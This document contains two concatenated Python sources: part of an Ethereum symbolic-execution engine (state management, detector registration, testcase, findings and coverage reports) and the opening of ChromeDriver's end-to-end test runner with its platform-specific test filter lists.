state_id = self._executor._workspace.save_state(state, state_id=state_id)
with self.locked_context('seth') as context:
if final:
# Keep it on a private list
context['_final_states'].add(state_id)
else:
# Keep it on a private list
context['_saved_states'].add(state_id)
return state_id
def load(self, state_id=None):
''' Load one of the running or final states.
:param state_id: If None it assumes there is a single running state
:type state_id: int or None
'''
state = None
if state_id is None:
#a single state was assumed
if self.count_running_states() == 1:
#Get the ID of the single running state
state_id = self._running_state_ids[0]
else:
raise EthereumError("More than one state running, you must specify state id.")
if state_id == -1:
state = self.initial_state
else:
state = self._executor._workspace.load_state(state_id, delete=False)
#froward events from newly loaded object
self._executor.forward_events_from(state, True)
return state
# Callbacks
def _symbolic_sha3(self, state, data, known_hashes):
''' INTERNAL USE '''
with self.locked_context('known_sha3', set) as known_sha3:
state.platform._sha3.update(known_sha3)
def _concrete_sha3(self, state, buf, value):
''' INTERNAL USE '''
with self.locked_context('known_sha3', set) as known_sha3:
known_sha3.add((str(buf), value))
def _terminate_state_callback(self, state, state_id, e):
''' INTERNAL USE
Every time a state finishes executing last transaction we save it in
our private list
'''
if str(e) == 'Abandoned state':
#do nothing
return
world = state.platform
state.context['last_exception'] = e
e.testcase = False # Do not generate a testcase file
if not world.all_transactions:
logger.debug("Something was wrong. Search terminated in the middle of an ongoing tx")
self.save(state, final=True)
return
tx = world.all_transactions[-1]
#is we initiated the Tx we need process the outcome for now.
#Fixme incomplete.
if tx.is_human():
if tx.sort == 'CREATE':
if tx.result == 'RETURN':
world.set_code(tx.address, tx.return_data)
else:
world.delete_account(tx.address)
else:
logger.info("Manticore exception. State should be terminated only at the end of the human transaction")
#Human tx that ends in this wont modify the storage so finalize and
# generate a testcase. FIXME This should be configurable as REVERT and
# THROWit actually changes the balance and nonce? of some accounts
if tx.result in {'REVERT', 'THROW', 'TXERROR'}:
self.save(state, final=True)
else:
assert tx.result in {'SELFDESTRUCT', 'RETURN', 'STOP'}
# if not a revert we save the state for further transactioning
self.save(state) # Add to running states
#Callbacks
def _load_state_callback(self, state, state_id):
''' INTERNAL USE
When a state was just loaded from stoage we do the pending transaction
'''
if '_pending_transaction' not in state.context:
return
world = state.platform
ty, caller, address, value, data, price = state.context['_pending_transaction']
del state.context['_pending_transaction']
if ty == 'CALL':
world.transaction(address=address, caller=caller, data=data, value=value, price=price)
else:
assert ty == 'CREATE'
world.create_contract(caller=caller, address=address, balance=value, init=data, price=price)
def _did_evm_execute_instruction_callback(self, state, instruction, arguments, result_ref):
''' INTERNAL USE '''
logger.debug("%s", state.platform.current_vm)
#TODO move to a plugin
at_init = state.platform.current_transaction.sort == 'CREATE'
if at_init:
coverage_context_name = 'init_coverage'
else:
coverage_context_name = 'runtime_coverage'
with self.locked_context(coverage_context_name, set) as coverage:
coverage.add((state.platform.current_vm.address, instruction.pc))
state.context.setdefault('evm.trace', []).append((state.platform.current_vm.address, instruction.pc, at_init))
def _did_evm_read_code(self, state, offset, size):
''' INTERNAL USE '''
with self.locked_context('code_data', set) as code_data:
for i in range(offset, offset + size):
code_data.add((state.platform.current_vm.address, i))
def get_metadata(self, address):
''' Gets the solidity metadata for address.
This is available only if address is a contract created from solidity
'''
return self.metadata.get(int(address))
def register_detector(self, d):
if not isinstance(d, Detector):
raise EthereumError("Not a Detector")
if d.name in self.detectors:
raise EthereumError("Detector already registered")
self.detectors[d.name] = d
self.register_plugin(d)
return d.name
def unregister_detector(self, d):
if not isinstance(d, (Detector, str)):
raise EthereumError("Not a Detector")
name = d
if isinstance(d, Detector):
name = d.name
if name not in self.detectors:
raise EthereumError("Detector not registered")
d = self.detectors[name]
del self.detectors[name]
self.unregister_plugin(d)
@property
def workspace(self):
return self._executor._workspace._store.uri
def generate_testcase(self, state, name, message=''):
self._generate_testcase_callback(state, name, message)
def _generate_testcase_callback(self, state, name, message=''):
'''
Create a serialized description of a given state.
:param state: The state to generate information about
:param message: Accompanying message
'''
# workspace should not be responsible for formating the output
# each object knows its secrets, each class should be able to report its
# final state
#super(ManticoreEVM, self)._generate_testcase_callback(state, name, message)
# TODO(mark): Refactor ManticoreOutput to let the platform be more in control
# so this function can be fully ported to EVMWorld.generate_workspace_files.
blockchain = state.platform
def flagged(flag):
return '(*)' if flag else ''
testcase = self._output.testcase(name.replace(' ', '_'))
last_tx = blockchain.last_transaction
if last_tx:
message = message + last_tx.result
logger.info("Generated testcase No. {} - {}".format(testcase.num, message))
local_findings = set()
for detector in self.detectors.values():
for address, pc, finding, at_init in detector.get_findings(state):
if (address, pc, finding, at_init) not in local_findings:
local_findings.add((address, pc, finding, at_init))
if len(local_findings):
with testcase.open_stream('findings') as findings:
for address, pc, finding, at_init in local_findings:
findings.write('- %s -\n' % finding)
findings.write(' Contract: 0x%x\n' % address)
findings.write(' EVM Program counter: %s%s\n' % (pc, at_init and " (at constructor)" or ""))
md = self.get_metadata(address)
if md is not None:
src = md.get_source_for(pc, runtime=not at_init)
findings.write(' Snippet:\n')
findings.write(src.replace('\n', '\n ').strip())
findings.write('\n')
with testcase.open_stream('summary') as summary:
summary.write("Message: %s\n" % message)
summary.write("Last exception: %s\n" % state.context.get('last_exception', 'None'))
if last_tx:
at_runtime = last_tx.sort != 'CREATE'
address, offset, at_init = state.context['evm.trace'][-1]
assert at_runtime != at_init
#Last instruction if last tx vas valid
if state.context['last_exception'].message != 'TXERROR':
metadata = self.get_metadata(blockchain.last_transaction.address)
if metadata is not None:
summary.write('Last instruction at contract %x offset %x\n' % (address, offset))
source_code_snippet = metadata.get_source_for(offset, at_runtime)
if source_code_snippet:
summary.write(source_code_snippet)
summary.write('\n')
# Accounts summary
is_something_symbolic = False
summary.write("%d accounts.\n" % len(blockchain.accounts))
for account_address in blockchain.accounts:
is_account_address_symbolic = issymbolic(account_address)
account_address = state.solve_one(account_address)
summary.write("* %s::\n" % self.account_name(account_address))
summary.write("Address: 0x%x %s\n" % (account_address, flagged(is_account_address_symbolic)))
balance = blockchain.get_balance(account_address)
is_balance_symbolic = issymbolic(balance)
is_something_symbolic = is_something_symbolic or is_balance_symbolic
balance = state.solve_one(balance)
summary.write("Balance: %d %s\n" % (balance, flagged(is_balance_symbolic)))
from .core.smtlib.visitors import translate_to_smtlib
storage = blockchain.get_storage(account_address)
summary.write("Storage: %s\n" % translate_to_smtlib(storage, use_bindings=True))
all_used_indexes = []
with state.constraints as temp_cs:
index = temp_cs.new_bitvec(256)
storage = blockchain.get_storage(account_address)
temp_cs.add(storage.get(index) != 0)
try:
while True:
a_index = solver.get_value(temp_cs, index)
all_used_indexes.append(a_index)
temp_cs.add(storage.get(a_index) != 0)
temp_cs.add(index != a_index)
except:
pass
if all_used_indexes:
summary.write("Storage:\n")
for i in all_used_indexes:
value = storage.get(i)
is_storage_symbolic = issymbolic(value)
summary.write("storage[%x] = %x %s\n" % (state.solve_one(i), state.solve_one(value), flagged(is_storage_symbolic)))
'''if blockchain.has_storage(account_address):
summary.write("Storage:\n")
for offset, value in blockchain.get_storage_items(account_address):
is_storage_symbolic = issymbolic(offset) or issymbolic(value)
offset = state.solve_one(offset)
value = state.solve_one(value)
summary.write("\t%032x -> %032x %s\n" % (offset, value, flagged(is_storage_symbolic)))
is_something_symbolic = is_something_symbolic or is_storage_symbolic
'''
runtime_code = state.solve_one(blockchain.get_code(account_address))
if runtime_code:
summary.write("Code:\n")
fcode = StringIO.StringIO(runtime_code)
for chunk in iter(lambda: fcode.read(32), b''):
summary.write('\t%s\n' % chunk.encode('hex'))
runtime_trace = set((pc for contract, pc, at_init in state.context['evm.trace'] if address == contract and not at_init))
summary.write("Coverage %d%% (on this state)\n" % calculate_coverage(runtime_code, runtime_trace)) # coverage % for address in this account/state
summary.write("\n")
if blockchain._sha3:
summary.write("Known hashes:\n")
for key, value in blockchain._sha3.items():
summary.write('%s::%x\n' % (key.encode('hex'), value))
if is_something_symbolic:
summary.write('\n\n(*) Example solution given. Value is symbolic and may take other values\n')
# Transactions
with testcase.open_stream('tx') as tx_summary:
is_something_symbolic = False
for tx in blockchain.transactions: # external transactions
tx_summary.write("Transactions Nr. %d\n" % blockchain.transactions.index(tx))
# The result if any RETURN or REVERT
tx_summary.write("Type: %s (%d)\n" % (tx.sort, tx.depth))
caller_solution = state.solve_one(tx.caller)
caller_name = self.account_name(caller_solution)
tx_summary.write("From: %s(0x%x) %s\n" % (caller_name, caller_solution, flagged(issymbolic(tx.caller))))
address_solution = state.solve_one(tx.address)
address_name = self.account_name(address_solution)
tx_summary.write("To: %s(0x%x) %s\n" % (address_name, address_solution, flagged(issymbolic(tx.address))))
tx_summary.write("Value: %d %s\n" % (state.solve_one(tx.value), flagged(issymbolic(tx.value))))
tx_data = state.solve_one(tx.data)
tx_summary.write("Data: %s %s\n" % (binascii.hexlify(tx_data), flagged(issymbolic(tx.data))))
if tx.return_data is not None:
return_data = state.solve_one(tx.return_data)
tx_summary.write("Return_data: %s %s\n" % (binascii.hexlify(return_data), flagged(issymbolic(tx.return_data))))
metadata = self.get_metadata(tx.address)
if tx.sort == 'CALL':
if metadata is not None:
function_id = tx.data[:4] # hope there is enough data
function_id = binascii.hexlify(state.solve_one(function_id))
signature = metadata.get_func_signature(function_id)
function_name = metadata.get_func_name(function_id)
if signature:
_, arguments = ABI.deserialize(signature, tx.data)
else:
arguments = (tx.data,)
return_data = None
if tx.result == 'RETURN':
ret_types = metadata.get_func_return_types(function_id)
return_data = ABI.deserialize(ret_types, tx.return_data) # function return
tx_summary.write('\n')
tx_summary.write("Function call:\n")
tx_summary.write("%s(" % state.solve_one(function_name))
tx_summary.write(','.join(map(repr, map(state.solve_one, arguments))))
is_argument_symbolic = any(map(issymbolic, arguments))
is_something_symbolic = is_something_symbolic or is_argument_symbolic
tx_summary.write(') -> %s %s\n' % (tx.result, flagged(is_argument_symbolic)))
if return_data is not None:
is_return_symbolic = any(map(issymbolic, return_data))
return_values = tuple(map(state.solve_one, return_data))
if len(return_values) == 1:
return_values = return_values[0]
tx_summary.write('return: %r %s\n' % (return_values, flagged(is_return_symbolic)))
is_something_symbolic = is_something_symbolic or is_return_symbolic
tx_summary.write('\n\n')
if is_something_symbolic:
tx_summary.write('\n\n(*) Example solution given. Value is symbolic and may take other values\n')
# logs
with testcase.open_stream('logs') as logs_summary:
is_something_symbolic = False
for log_item in blockchain.logs:
is_log_symbolic = issymbolic(log_item.memlog)
is_something_symbolic = is_log_symbolic or is_something_symbolic
solved_memlog = state.solve_one(log_item.memlog)
printable_bytes = ''.join(filter(lambda c: c in string.printable, map(chr, solved_memlog)))
logs_summary.write("Address: %x\n" % log_item.address)
logs_summary.write("Memlog: %s (%s) %s\n" % (binascii.hexlify(solved_memlog), printable_bytes, flagged(is_log_symbolic)))
logs_summary.write("Topics:\n")
for i, topic in enumerate(log_item.topics):
logs_summary.write("\t%d) %x %s" % (i, state.solve_one(topic), flagged(issymbolic(topic))))
with testcase.open_stream('constraints') as smt_summary:
smt_summary.write(str(state.constraints))
with testcase.open_stream('pkl') as statef:
try:
statef.write(pickle.dumps(state, 2))
except RuntimeError:
# recursion exceeded. try a slower, iterative solution
from .utils import iterpickle
logger.debug("Using iterpickle to dump state")
statef.write(iterpickle.dumps(state, 2))
trace = state.context.get('evm.trace')
if trace:
with testcase.open_stream('trace') as f:
self._emit_trace_file(f, trace)
return testcase
@staticmethod
def _emit_trace_file(filestream, trace):
"""
:param filestream: file object for the workspace trace file
:param trace: list of (contract address, pc) tuples
:type trace: list[tuple(int, int)]
"""
for contract, pc, at_init in trace:
if pc == 0:
filestream.write('---\n')
ln = '0x{:x}:0x{:x} {}\n'.format(contract, pc, '*' if at_init else '')
filestream.write(ln)
@property
def global_findings(self):
global_findings = set()
for detector in self.detectors.values():
for address, pc, finding, at_init in detector.global_findings:
if (address, pc, finding, at_init) not in global_findings:
global_findings.add((address, pc, finding, at_init))
return global_findings
def finalize(self):
"""
Terminate and generate testcases for all currently alive states (contract states that cleanly executed
to a STOP or RETURN in the last symbolic transaction).
"""
logger.debug("Finalizing %d states.", self.count_states())
def finalizer(state_id):
state_id = self._terminate_state_id(state_id)
st = self.load(state_id)
logger.debug("Generating testcase for state_id %d", state_id)
self._generate_testcase_callback(st, 'test', '')
def worker_finalize(q):
try:
while True:
finalizer(q.get_nowait())
except EmptyQueue:
pass
q = Queue()
for state_id in self._all_state_ids:
#we need to remove -1 state before forking because it may be in memory
if state_id == -1:
finalizer(-1)
else:
q.put(state_id)
report_workers = []
for _ in range(self._config_procs):
proc = Process(target=worker_finalize, args=(q,))
proc.start()
report_workers.append(proc)
for proc in report_workers:
proc.join()
#global summary
if len(self.global_findings):
with self._output.save_stream('global.findings') as global_findings:
for address, pc, finding, at_init in self.global_findings:
global_findings.write('- %s -\n' % finding)
global_findings.write(' Contract: %s\n' % address)
global_findings.write(' EVM Program counter: %s%s\n' % (pc, at_init and " (at constructor)" or ""))
md = self.get_metadata(address)
if md is not None:
src = md.get_source_for(pc, runtime=not at_init)
global_findings.write(' Solidity snippet:\n')
global_findings.write(src.replace('\n', '\n ').strip())
global_findings.write('\n')
with self._output.save_stream('global.summary') as global_summary:
# (accounts created by contract code are not in this list )
global_summary.write("Global runtime coverage:\n")
for address in self.contract_accounts.values():
global_summary.write("{:x}: {:2.2f}%\n".format(int(address), self.global_coverage(address)))
md = self.get_metadata(address)
if md is not None and len(md.warnings) > 0:
global_summary.write('\n\nCompiler warnings for %s:\n' % md.name)
global_summary.write(md.warnings)
for address, md in self.metadata.items():
with self._output.save_stream('global_%s.sol' % md.name) as global_src:
global_src.write(md.source_code)
with self._output.save_stream('global_%s_runtime.bytecode' % md.name) as global_runtime_bytecode:
global_runtime_bytecode.write(md.runtime_bytecode)
with self._output.save_stream('global_%s_init.bytecode' % md.name) as global_init_bytecode:
global_init_bytecode.write(md.init_bytecode)
with self._output.save_stream('global_%s.runtime_asm' % md.name) as global_runtime_asm:
runtime_bytecode = md.runtime_bytecode
with self.locked_context('runtime_coverage') as seen:
count, total = 0, 0
for i in evm.EVMAsm.disassemble_all(runtime_bytecode):
if (address, i.pc) in seen:
count += 1
global_runtime_asm.write('*')
else:
global_runtime_asm.write(' ')
global_runtime_asm.write('%4x: %s\n' % (i.pc, i))
total += 1
with self._output.save_stream('global_%s.init_asm' % md.name) as global_init_asm:
with self.locked_context('init_coverage') as seen:
count, total = 0, 0
for i in evm.EVMAsm.disassemble_all(md.init_bytecode):
if (address, i.pc) in seen:
count += 1
global_init_asm.write('*')
else:
global_init_asm.write(' ')
global_init_asm.write('%4x: %s\n' % (i.pc, i))
total += 1
with self._output.save_stream('global_%s.init_visited' % md.name) as f:
with self.locked_context('init_coverage') as seen:
visited = set((o for (a, o) in seen if a == address))
for o in sorted(visited):
f.write('0x%x\n' % o)
with self._output.save_stream('global_%s.runtime_visited' % md.name) as f:
with self.locked_context('runtime_coverage') as seen:
visited = set()
for (a, o) in seen:
if a == address:
visited.add(o)
for o in sorted(visited):
f.write('0x%x\n' % o)
# delete actual streams from storage
for state_id in self._all_state_ids:
# state_id -1 is always only on memory
if state_id != -1:
self._executor._workspace.rm_state(state_id)
# clean up lists
with self.locked_context('seth') as seth_context:
seth_context['_saved_states'] = set()
seth_context['_final_states'] = set()
logger.info("Results in %s", self.workspace)
def global_coverage(self, account):
''' Returns code coverage for the contract on `account_address`.
This sums up all the visited code lines from any of the explored
states.
'''
account_address = int(account)
runtime_bytecode = None
#Search one state in which the account_address exists
for state in self.all_states:
world = state.platform
if account_address in world:
code = world.get_code(account_address)
runtime_bytecode = state.solve_one(code)
break
else:
return 0.0
with self.locked_context('runtime_coverage') as coverage:
seen = {off for addr, off in coverage if addr == account_address}
return calculate_coverage(runtime_bytecode, seen)
# TODO: Find a better way to suppress execution of Manticore._did_finish_run_callback
# We suppress because otherwise we log it many times and it looks weird.
def _did_finish_run_callback(self):
pass
|
run_py_tests.py
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""End to end tests for ChromeDriver."""
# Note that to run Android tests you must have the following line in
# .gclient (in the parent directory of src): target_os = [ 'android' ]
# to get the appropriate adb version for ChromeDriver.
# TODO (crbug.com/857239): Remove above comment when adb version
# is updated in Devil.
from __future__ import print_function
from __future__ import absolute_import
import base64
import json
import math
import optparse
import os
import re
import shutil
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import six.moves.urllib.request, six.moves.urllib.parse, six.moves.urllib.error
import six.moves.urllib.request, six.moves.urllib.error, six.moves.urllib.parse
import uuid
import imghdr
import struct
from six.moves import map
from six.moves import range
from six.moves import zip
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
_PARENT_DIR = os.path.join(_THIS_DIR, os.pardir)
_CLIENT_DIR = os.path.join(_PARENT_DIR, "client")
_SERVER_DIR = os.path.join(_PARENT_DIR, "server")
_TEST_DIR = os.path.join(_PARENT_DIR, "test")
sys.path.insert(1, _PARENT_DIR)
import chrome_paths
import util
sys.path.remove(_PARENT_DIR)
sys.path.insert(1, _CLIENT_DIR)
import chromedriver
import websocket_connection
import webelement
import webshadowroot
sys.path.remove(_CLIENT_DIR)
sys.path.insert(1, _SERVER_DIR)
import server
sys.path.remove(_SERVER_DIR)
sys.path.insert(1, _TEST_DIR)
import unittest_util
import webserver
sys.path.remove(_TEST_DIR)
sys.path.insert(0,os.path.join(chrome_paths.GetSrc(), 'third_party',
'catapult', 'third_party', 'gsutil',
'third_party', 'monotonic'))
from monotonic import monotonic
_TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver')
if util.IsLinux():
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'third_party',
'catapult', 'devil'))
from devil.android import device_utils
from devil.android import forwarder
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android'))
import devil_chromium
from pylib import constants
_NEGATIVE_FILTER = [
# This test is too flaky on the bots, but seems to run perfectly fine
# on developer workstations.
'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed',
'ChromeDriverTest.testEmulateNetworkConditionsSpeed',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=833
'ChromeDriverTest.testAlertOnNewWindow',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2532
'ChromeDriverPageLoadTimeoutTest.testRefreshWithPageLoadTimeout',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=3517
'ChromeDriverTest.testPrint',
'ChromeDriverTest.testPrintInvalidArgument',
]
_OS_SPECIFIC_FILTER = {}
_OS_SPECIFIC_FILTER['win'] = [
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=299
'ChromeLogPathCapabilityTest.testChromeLogPath',
# https://bugs.chromium.org/p/chromium/issues/detail?id=1196363
'ChromeDownloadDirTest.testFileDownloadAfterTabHeadless',
'ChromeDownloadDirTest.testFileDownloadWithClickHeadless',
'ChromeDownloadDirTest.testFileDownloadWithGetHeadless',
'HeadlessChromeDriverTest.testNewTabDoesNotFocus',
'HeadlessChromeDriverTest.testNewWindowDoesNotFocus',
'HeadlessChromeDriverTest.testPrintHeadless',
'HeadlessChromeDriverTest.testPrintInvalidArgumentHeadless',
'HeadlessChromeDriverTest.testWindowFullScreen',
'HeadlessInvalidCertificateTest.testLoadsPage',
'HeadlessInvalidCertificateTest.testNavigateNewWindow',
'RemoteBrowserTest.testConnectToRemoteBrowserLiteralAddressHeadless',
]
_OS_SPECIFIC_FILTER['linux'] = [
]
_OS_SPECIFIC_FILTER['mac'] = [
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1927
# https://crbug.com/1036636
'MobileEmulationCapabilityTest.testTapElement',
# https://bugs.chromium.org/p/chromium/issues/detail?id=1011225
'ChromeDriverTest.testActionsMultiTouchPoint',
# Flaky: https://crbug.com/1156576.
'ChromeDriverTestLegacy.testContextMenuEventFired',
# Flaky: https://crbug.com/1157533.
'ChromeDriverTest.testShadowDomFindElement',
]
_DESKTOP_NEGATIVE_FILTER = [
# Desktop doesn't support touch (without --touch-events).
'ChromeDriverTestLegacy.testTouchSingleTapElement',
'ChromeDriverTest.testTouchDownMoveUpElement',
'ChromeDriverTestLegacy.testTouchScrollElement',
'ChromeDriverTestLegacy.testTouchDoubleTapElement',
'ChromeDriverTestLegacy.testTouchLongPressElement',
'ChromeDriverTest.testTouchFlickElement',
'ChromeDriverAndroidTest.*',
]
_INTEGRATION_NEGATIVE_FILTER = [
# The following test is flaky on Windows and Mac.
'ChromeDownloadDirTest.testDownloadDirectoryOverridesExistingPreferences',
# ChromeDriverLogTest tests an internal ChromeDriver feature, not needed
# for integration test.
'ChromeDriverLogTest.*',
# ChromeDriverPageLoadTimeoutTest is flaky, particularly on Mac.
'ChromeDriverPageLoadTimeoutTest.*',
# Some trivial test cases that provide no additional value beyond what are
# already tested by other test cases.
'ChromeDriverTest.testGetCurrentWindowHandle',
'ChromeDriverTest.testStartStop',
# PerfTest takes a long time, requires extra setup, and adds little value
# to integration testing.
'PerfTest.*',
# Flaky: https://crbug.com/899919
'SessionHandlingTest.testGetSessions',
# Flaky due to occasional timeout in starting Chrome
'ZChromeStartRetryCountTest.testChromeStartRetryCount',
]
def _GetDesktopNegativeFilter():
filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER
os = util.GetPlatformName()
if os in _OS_SPECIFIC_FILTER:
filter += _OS_SPECIFIC_FILTER[os]
return filter
_ANDROID_NEGATIVE_FILTER = {}
_ANDROID_NEGATIVE_FILTER['chrome'] = (
_NEGATIVE_FILTER + [
# Android doesn't support switches and extensions.
'ChromeSwitchesCapabilityTest.*',
'ChromeExtensionsCapabilityTest.*',
'MobileEmulationCapabilityTest.*',
'ChromeDownloadDirTest.*',
# https://crbug.com/274650
'ChromeDriverTest.testCloseWindow',
# Most window operations don't make sense on Android.
'ChromeDriverTest.testWindowFullScreen',
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
'ChromeDriverTest.testWindowRect',
'ChromeDriverTest.testWindowMaximize',
'ChromeDriverTest.testWindowMinimize',
'ChromeLogPathCapabilityTest.testChromeLogPath',
# Connecting to running browser is not supported on Android.
'RemoteBrowserTest.*',
# Don't enable perf testing on Android yet.
'PerfTest.*',
# Android doesn't support multiple sessions on one device.
'SessionHandlingTest.testGetSessions',
# Android doesn't use the chrome://print dialog.
'ChromeDriverTest.testCanSwitchToPrintPreviewDialog',
# Chrome 44+ for Android doesn't dispatch the dblclick event
'ChromeDriverTest.testMouseDoubleClick',
# Page cannot be loaded from file:// URI in Android unless it
# is stored in device.
'ChromeDriverTest.testCanClickAlertInIframes',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2081
'ChromeDriverTest.testCloseWindowUsingJavascript',
# Android doesn't support headless mode
'HeadlessInvalidCertificateTest.*',
'HeadlessChromeDriverTest.*',
# Tests of the desktop Chrome launch process.
'LaunchDesktopTest.*',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2737
'ChromeDriverTest.testTakeElementScreenshot',
'ChromeDriverTest.testTakeElementScreenshotPartlyVisible',
'ChromeDriverTest.testTakeElementScreenshotInIframe',
# setWindowBounds not supported on Android
'ChromeDriverTest.testTakeLargeElementScreenshot',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2786
'ChromeDriverTest.testActionsTouchTap',
'ChromeDriverTest.testTouchDownMoveUpElement',
'ChromeDriverTest.testTouchFlickElement',
# Android has no concept of tab or window, and will always lose focus
# on tab creation. https://crbug.com/chromedriver/3018
'ChromeDriverTest.testNewWindowDoesNotFocus',
'ChromeDriverTest.testNewTabDoesNotFocus',
# Android does not support the virtual authenticator environment.
'ChromeDriverSecureContextTest.*',
# Covered by Desktop tests; can't create 2 browsers in Android
'SupportIPv4AndIPv6.testSupportIPv4AndIPv6',
# Browser context management is not supported by Android
'ChromeDriverTest.testClipboardPermissions',
'ChromeDriverTest.testMidiPermissions',
'ChromeDriverTest.testMultiplePermissions',
'ChromeDriverTest.testNewWindowSameDomainHasSamePermissions',
'ChromeDriverTest.testPermissionStates',
'ChromeDriverTest.testPermissionsOpaqueOriginsThrowError',
'ChromeDriverTest.testPermissionsSameOrigin',
'ChromeDriverTest.testPermissionsSameOriginDoesNotAffectOthers',
'ChromeDriverTest.testPersistentStoragePermissions',
'ChromeDriverTest.testPushAndNotificationsPermissions',
'ChromeDriverTest.testSensorPermissions',
'ChromeDriverTest.testSettingPermissionDoesNotAffectOthers',
# Android does not allow changing window size
'JavaScriptTests.*',
# These tests are failing on Android
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=3560
'ChromeDriverTest.testTakeLargeElementViewportScreenshot',
'ChromeDriverTest.testTakeLargeElementFullPageScreenshot'
]
)
_ANDROID_NEGATIVE_FILTER['chrome_stable'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + [
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350
'ChromeDriverTest.testSlowIFrame',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503
'ChromeDriverTest.testGetLogOnClosedWindow',
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
'ChromeDriverTest.testSwitchToWindow',
# Feature not yet supported in this version
'ChromeDriverTest.testGenerateTestReport',
]
)
_ANDROID_NEGATIVE_FILTER['chrome_beta'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + [
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503
'ChromeDriverTest.testGetLogOnClosedWindow',
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
'ChromeDriverTest.testSwitchToWindow',
# Feature not yet supported in this version
'ChromeDriverTest.testGenerateTestReport',
]
)
_ANDROID_NEGATIVE_FILTER['chromium'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + []
)
_ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome_stable'] + [
# WebView doesn't support emulating network conditions.
'ChromeDriverTest.testEmulateNetworkConditions',
'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed',
'ChromeDriverTest.testEmulateNetworkConditionsOffline',
'ChromeDriverTest.testEmulateNetworkConditionsSpeed',
'ChromeDriverTest.testEmulateNetworkConditionsName',
# WebView shell doesn't support popups or popup blocking.
'ChromeDriverTest.testPopups',
'ChromeDriverTest.testDontGoBackOrGoForward',
# ChromeDriver WebView shell doesn't support multiple tabs.
'ChromeDriverTest.testCloseWindowUsingJavascript',
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testSwitchToWindow',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
'ChromeDriverTest.testGetLogOnClosedWindow',
# The WebView shell that we test against (on KitKat) does not perform
# cross-process navigations.
# TODO(samuong): reenable when it does.
'ChromeDriverPageLoadTimeoutTest.testPageLoadTimeoutCrossDomain',
'ChromeDriverPageLoadTimeoutTest.'
'testHistoryNavigationWithPageLoadTimeout',
# Webview shell doesn't support Alerts.
'ChromeDriverTest.testAlert',
'ChromeDriverTest.testAlertOnNewWindow',
'ChromeDesiredCapabilityTest.testUnexpectedAlertBehaviour',
'ChromeDriverTest.testAlertHandlingOnPageUnload',
'ChromeDriverTest.testClickElementAfterNavigation',
'ChromeDriverTest.testGetLogOnWindowWithAlert',
'ChromeDriverTest.testSendTextToAlert',
'ChromeDriverTest.testUnexpectedAlertOpenExceptionMessage',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2332
'ChromeDriverTestLegacy.testTouchScrollElement',
]
)
class ChromeDriverBaseTest(unittest.TestCase):
"""Base class for testing chromedriver functionalities."""
def __init__(self, *args, **kwargs):
super(ChromeDriverBaseTest, self).__init__(*args, **kwargs)
self._drivers = []
def tearDown(self):
for driver in self._drivers:
try:
driver.Quit()
except:
pass
def CreateDriver(self, server_url=None, server_pid=None,
download_dir=None, **kwargs):
if server_url is None:
server_url = _CHROMEDRIVER_SERVER_URL
if server_pid is None:
server_pid = _CHROMEDRIVER_SERVER_PID
if (not _ANDROID_PACKAGE_KEY and 'debugger_address' not in kwargs and
'_MINIDUMP_PATH' in globals() and _MINIDUMP_PATH):
# Environment required for minidump not supported on Android
# minidumpPath will fail parsing if debugger_address is set
if 'experimental_options' in kwargs:
if 'minidumpPath' not in kwargs['experimental_options']:
kwargs['experimental_options']['minidumpPath'] = _MINIDUMP_PATH
else:
kwargs['experimental_options'] = {'minidumpPath': _MINIDUMP_PATH}
android_package = None
android_activity = None
android_process = None
if _ANDROID_PACKAGE_KEY:
android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package
if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell':
android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity
android_process = '%s:main' % android_package
driver = chromedriver.ChromeDriver(server_url, server_pid,
chrome_binary=_CHROME_BINARY,
android_package=android_package,
android_activity=android_activity,
android_process=android_process,
download_dir=download_dir,
test_name=self.id(),
**kwargs)
self._drivers += [driver]
return driver
def WaitForNewWindow(self, driver, old_handles, check_closed_windows=True):
"""Wait for at least one new window to show up in 20 seconds.
Args:
old_handles: Handles to all old windows before the new window is added.
check_closed_windows: If True, assert that no windows are closed before
the new window is added.
Returns:
Handle to a new window. None if timeout.
"""
deadline = monotonic() + 20
while monotonic() < deadline:
handles = driver.GetWindowHandles()
if check_closed_windows:
self.assertTrue(set(old_handles).issubset(handles))
new_handles = set(handles).difference(set(old_handles))
if len(new_handles) > 0:
return new_handles.pop()
time.sleep(0.01)
return None
def WaitForCondition(self, predicate, timeout=5, timestep=0.1):
"""Wait for a condition to become true.
Args:
predicate: A function that returns a boolean value.
"""
deadline = monotonic() + timeout
while monotonic() < deadline:
if predicate():
return True
